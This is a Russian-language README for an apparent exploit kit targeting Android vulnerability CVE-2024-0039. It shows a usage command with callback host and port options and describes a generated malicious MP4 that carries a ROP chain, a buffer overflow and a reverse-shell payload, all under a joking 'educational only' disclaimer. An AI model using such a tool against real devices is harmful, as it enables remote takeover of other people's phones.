Python-скрипт для использование уязвимости CVE-2024-0039: выполнения произвольного кода на уязвимых устройствах Android.
ВНИМАНИЕ: Этот код предназначен только для образования и созидания, службе на стороне добра, тксзть!
Запустите скрипт с необходимыми аргументами:
python exploit.py --cb-host <Ваш IP> --cb-port <Ваш порт> --output exploit.mp4
- exploit.py: Основной скрипт эксплоита, который создает вредоносный MP4 файл и логирует процесс выполнения.
- logs/: Дневник для вашего образовательно созидательного злодейства.
- exploit.log:
- utils/: Суда вынесены хелперы для чистоты кода
- helpers.py
- tests/: Тесты (придерживаемся лучших практик)
- exploit.test.py
Создает вредоносный полезный груз с ROP-цепочкой и обратным подключением (reverse shell).
- Создаем ROP цепочку: Настройка ROP цепочки для выполнения произвольного кода.
- Создаем переполнение буфера (и заполняем его буквой 'A'): Заполнение буфера "A"-шками для переполнения.
- Создаем полезную нагрузку для обратного подключения (не пытайтесь это дома): Настройка обратного подключения.
- Генерируем добро в файл
- Создание добра в файл
- Запись в файл
- Сообщение об успешном создании файла
Логи сохраняются в logs/exploit.log
. Логирует действия скрипта, такие как создание ROP цепочки, переполнение буфера, запись в файл и успешное выполнение эксплоита.
- Все адреса и команды в ROP-цепочке являются примерными и должны быть настроены в соответствии с конкретной уязвимостью и целью.
- Этот код предназначен только для образовательных целей и не должен использоваться для несанкционированных действий.
Этот проект лицензирован под лицензией MIT - см. файл LICENSE
для получения подробной информации. Потому что даже хакинг должен быть легальным... ну, почти.